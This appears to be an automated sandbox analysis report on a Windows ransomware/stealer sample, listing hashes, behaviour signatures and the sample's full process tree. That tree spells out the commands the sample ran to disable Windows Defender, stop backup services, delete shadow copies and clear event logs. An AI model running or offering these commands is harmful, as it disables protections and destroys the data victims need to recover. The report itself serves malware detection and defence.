Overview

overview

10

Static

static

a235bb61d1...le.exe

windows7_x64

10

a235bb61d1...le.exe

windows10_x64

10

Analysis

  • max time kernel
    134s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    12/01/2022, 14:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe

  • Size

    3.5MB

  • MD5

    851a6706bd679387f197f552dae896bc

  • SHA1

    ee7d2cf647ee85becd133146b4f600f2fa6965e8

  • SHA256

    a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b

  • SHA512

    ba586db7ec4cc3bf89f2e2ad037f1a36e139f55e125087a3840331bb7d47105cffb2d4e46b154fde07007f0e7b8be202fa76f0eca7636409f3c47484bd081a1e

Score
10/10
evasionransomwarespywarestealertrojan

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    evasion
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Clears Windows event logs 1 TTPs
    evasionransomware
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:2904
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:784
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2832
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:2264
          • C:\Windows\SysWOW64\net.exe
            net.exe stop "UI0Detect" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3392
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "UI0Detect" /y
              3⤵
                PID:1360
            • C:\Windows\SysWOW64\net.exe
              net.exe stop "vmicvss" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2392
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "vmicvss" /y
                3⤵
                  PID:1348
              • C:\Windows\SysWOW64\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:836
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:1848
                • C:\Windows\SysWOW64\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2344
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1204
                  • C:\Windows\SysWOW64\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4088
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:1548
                    • C:\Windows\SysWOW64\net.exe
                      net.exe stop "UnistoreSvc_1509d" /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1608
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop "UnistoreSvc_1509d" /y
                        3⤵
                          PID:1800
                      • C:\Windows\SysWOW64\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:1716
                        • C:\Windows\SysWOW64\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:1980
                          • C:\Windows\SysWOW64\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:2148
                            • C:\Windows\SysWOW64\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:2580
                              • C:\Windows\SysWOW64\sc.exe
                                sc.exe config "vmicvss" start= disabled
                                2⤵
                                  PID:3268
                                • C:\Windows\SysWOW64\sc.exe
                                  sc.exe config "VSS" start= disabled
                                  2⤵
                                    PID:3968
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc.exe config "wbengine" start= disabled
                                    2⤵
                                      PID:1668
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc.exe config "WebClient" start= disabled
                                      2⤵
                                        PID:3432
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc.exe config "UnistoreSvc_1509d" start= disabled
                                        2⤵
                                          PID:3688
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                          2⤵
                                            PID:3228
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                            2⤵
                                              PID:3860
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:2040
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:3920
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:1216
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:3224
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2116
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:2260
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:2600
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:60
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:3056
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:684
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:544
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:2276
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:1468
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:1736
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                          2⤵
                                                                            PID:1564
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                            2⤵
                                                                              PID:2200
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                              2⤵
                                                                                PID:2188
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                2⤵
                                                                                  PID:2744
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                  2⤵
                                                                                    PID:2984
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                    2⤵
                                                                                      PID:724
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                      2⤵
                                                                                        PID:2964
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                        2⤵
                                                                                          PID:3728
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:3500
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:1844
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:1228
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                          2⤵
                                                                                            PID:3776
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            2⤵
                                                                                              PID:1596
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              2⤵
                                                                                                PID:2120
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:1360
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                  • Modifies security service
                                                                                                  PID:1224
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:396
                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                    vssadmin.exe delete shadows /all /quiet
                                                                                                    2⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:2352
                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                    wevtutil.exe cl system
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3412
                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                    wevtutil.exe cl security
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2104
                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                    wevtutil.exe cl application
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1156
                                                                                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                    wmic.exe SHADOWCOPY /nointeractive
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2160
                                                                                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                    wmic.exe shadowcopy delete
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2748
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                    2⤵
                                                                                                      PID:2956
                                                                                                      • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                        3⤵
                                                                                                        • Deletes Windows Defender Definitions
                                                                                                        PID:1968
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                      2⤵
                                                                                                        PID:2732
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                          3⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:2404
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                        2⤵
                                                                                                          PID:1088
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1204

                                                                                                      Network

                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • memory/1204-466-0x000000007EAD0000-0x000000007EAD1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1204-464-0x00000000091F0000-0x000000000920E000-memory.dmp

                                                                                                        Filesize

                                                                                                        120KB

                                                                                                        Download

                                                                                                      • memory/1204-441-0x0000000007A00000-0x0000000007A66000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/1204-665-0x00000000094D0000-0x00000000094EA000-memory.dmp

                                                                                                        Filesize

                                                                                                        104KB

                                                                                                        Download

                                                                                                      • memory/1204-442-0x00000000076F0000-0x0000000007756000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/1204-456-0x0000000007050000-0x0000000007678000-memory.dmp

                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                        Download

                                                                                                      • memory/1204-443-0x0000000007A70000-0x0000000007DC0000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.3MB

                                                                                                        Download

                                                                                                      • memory/1204-438-0x0000000006A10000-0x0000000006A11000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1204-457-0x0000000009210000-0x0000000009243000-memory.dmp

                                                                                                        Filesize

                                                                                                        204KB

                                                                                                        Download

                                                                                                      • memory/1204-437-0x0000000007050000-0x0000000007678000-memory.dmp

                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                        Download

                                                                                                      • memory/1204-540-0x0000000006A13000-0x0000000006A14000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1204-471-0x0000000009500000-0x0000000009594000-memory.dmp

                                                                                                        Filesize

                                                                                                        592KB

                                                                                                        Download

                                                                                                      • memory/1204-470-0x0000000009260000-0x0000000009305000-memory.dmp

                                                                                                        Filesize

                                                                                                        660KB

                                                                                                        Download

                                                                                                      • memory/1204-440-0x0000000007010000-0x0000000007032000-memory.dmp

                                                                                                        Filesize

                                                                                                        136KB

                                                                                                        Download

                                                                                                      • memory/1204-445-0x0000000007E30000-0x0000000007E4C000-memory.dmp

                                                                                                        Filesize

                                                                                                        112KB

                                                                                                        Download

                                                                                                      • memory/1204-462-0x0000000007FA0000-0x0000000007FEB000-memory.dmp

                                                                                                        Filesize

                                                                                                        300KB

                                                                                                        Download

                                                                                                      • memory/1204-463-0x0000000008220000-0x0000000008296000-memory.dmp

                                                                                                        Filesize

                                                                                                        472KB

                                                                                                        Download

                                                                                                      • memory/1204-439-0x0000000006A12000-0x0000000006A13000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1204-446-0x0000000007FA0000-0x0000000007FEB000-memory.dmp

                                                                                                        Filesize

                                                                                                        300KB

                                                                                                        Download

                                                                                                      • memory/1204-460-0x0000000007A00000-0x0000000007A66000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/1204-676-0x00000000094C0000-0x00000000094C8000-memory.dmp

                                                                                                        Filesize

                                                                                                        32KB

                                                                                                        Download

                                                                                                      • memory/1204-461-0x00000000076F0000-0x0000000007756000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/1204-447-0x0000000008220000-0x0000000008296000-memory.dmp

                                                                                                        Filesize

                                                                                                        472KB

                                                                                                        Download

                                                                                                      • memory/1204-670-0x00000000094D0000-0x00000000094EA000-memory.dmp

                                                                                                        Filesize

                                                                                                        104KB

                                                                                                        Download

                                                                                                      • memory/1204-459-0x0000000007010000-0x0000000007032000-memory.dmp

                                                                                                        Filesize

                                                                                                        136KB

                                                                                                        Download

                                                                                                      • memory/1204-436-0x00000000045A0000-0x00000000045D6000-memory.dmp

                                                                                                        Filesize

                                                                                                        216KB

                                                                                                        Download

                                                                                                      • memory/1204-458-0x0000000009210000-0x0000000009243000-memory.dmp

                                                                                                        Filesize

                                                                                                        204KB

                                                                                                        Download

                                                                                                      • memory/1204-671-0x00000000094C0000-0x00000000094C8000-memory.dmp

                                                                                                        Filesize

                                                                                                        32KB

                                                                                                        Download

                                                                                                      • memory/2404-418-0x0000000009E60000-0x0000000009E68000-memory.dmp

                                                                                                        Filesize

                                                                                                        32KB

                                                                                                        Download

                                                                                                      • memory/2404-185-0x0000000007400000-0x0000000007401000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-192-0x0000000008300000-0x000000000831C000-memory.dmp

                                                                                                        Filesize

                                                                                                        112KB

                                                                                                        Download

                                                                                                      • memory/2404-193-0x0000000008840000-0x000000000888B000-memory.dmp

                                                                                                        Filesize

                                                                                                        300KB

                                                                                                        Download

                                                                                                      • memory/2404-194-0x0000000008AB0000-0x0000000008B26000-memory.dmp

                                                                                                        Filesize

                                                                                                        472KB

                                                                                                        Download

                                                                                                      • memory/2404-195-0x0000000003600000-0x0000000003601000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-203-0x0000000007A40000-0x0000000008068000-memory.dmp

                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                        Download

                                                                                                      • memory/2404-204-0x0000000009B50000-0x0000000009B83000-memory.dmp

                                                                                                        Filesize

                                                                                                        204KB

                                                                                                        Download

                                                                                                      • memory/2404-205-0x0000000009B50000-0x0000000009B83000-memory.dmp

                                                                                                        Filesize

                                                                                                        204KB

                                                                                                        Download

                                                                                                      • memory/2404-206-0x00000000078E0000-0x0000000007902000-memory.dmp

                                                                                                        Filesize

                                                                                                        136KB

                                                                                                        Download

                                                                                                      • memory/2404-207-0x0000000008160000-0x00000000081C6000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/2404-208-0x00000000081D0000-0x0000000008236000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/2404-209-0x0000000008840000-0x000000000888B000-memory.dmp

                                                                                                        Filesize

                                                                                                        300KB

                                                                                                        Download

                                                                                                      • memory/2404-210-0x0000000008AB0000-0x0000000008B26000-memory.dmp

                                                                                                        Filesize

                                                                                                        472KB

                                                                                                        Download

                                                                                                      • memory/2404-211-0x0000000009B10000-0x0000000009B2E000-memory.dmp

                                                                                                        Filesize

                                                                                                        120KB

                                                                                                        Download

                                                                                                      • memory/2404-212-0x000000007EF30000-0x000000007EF31000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-217-0x0000000009C80000-0x0000000009D25000-memory.dmp

                                                                                                        Filesize

                                                                                                        660KB

                                                                                                        Download

                                                                                                      • memory/2404-218-0x0000000009EA0000-0x0000000009F34000-memory.dmp

                                                                                                        Filesize

                                                                                                        592KB

                                                                                                        Download

                                                                                                      • memory/2404-219-0x0000000007403000-0x0000000007404000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-412-0x0000000009E70000-0x0000000009E8A000-memory.dmp

                                                                                                        Filesize

                                                                                                        104KB

                                                                                                        Download

                                                                                                      • memory/2404-417-0x0000000009E70000-0x0000000009E8A000-memory.dmp

                                                                                                        Filesize

                                                                                                        104KB

                                                                                                        Download

                                                                                                      • memory/2404-190-0x00000000081D0000-0x0000000008236000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/2404-423-0x0000000009E60000-0x0000000009E68000-memory.dmp

                                                                                                        Filesize

                                                                                                        32KB

                                                                                                        Download

                                                                                                      • memory/2404-189-0x0000000008160000-0x00000000081C6000-memory.dmp

                                                                                                        Filesize

                                                                                                        408KB

                                                                                                        Download

                                                                                                      • memory/2404-188-0x00000000078E0000-0x0000000007902000-memory.dmp

                                                                                                        Filesize

                                                                                                        136KB

                                                                                                        Download

                                                                                                      • memory/2404-187-0x0000000007A40000-0x0000000008068000-memory.dmp

                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                        Download

                                                                                                      • memory/2404-186-0x0000000007402000-0x0000000007403000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-191-0x00000000084F0000-0x0000000008840000-memory.dmp

                                                                                                        Filesize

                                                                                                        3.3MB

                                                                                                        Download

                                                                                                      • memory/2404-184-0x0000000007300000-0x0000000007336000-memory.dmp

                                                                                                        Filesize

                                                                                                        216KB

                                                                                                        Download

                                                                                                      • memory/2404-183-0x0000000003600000-0x0000000003601000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2404-182-0x0000000003600000-0x0000000003601000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download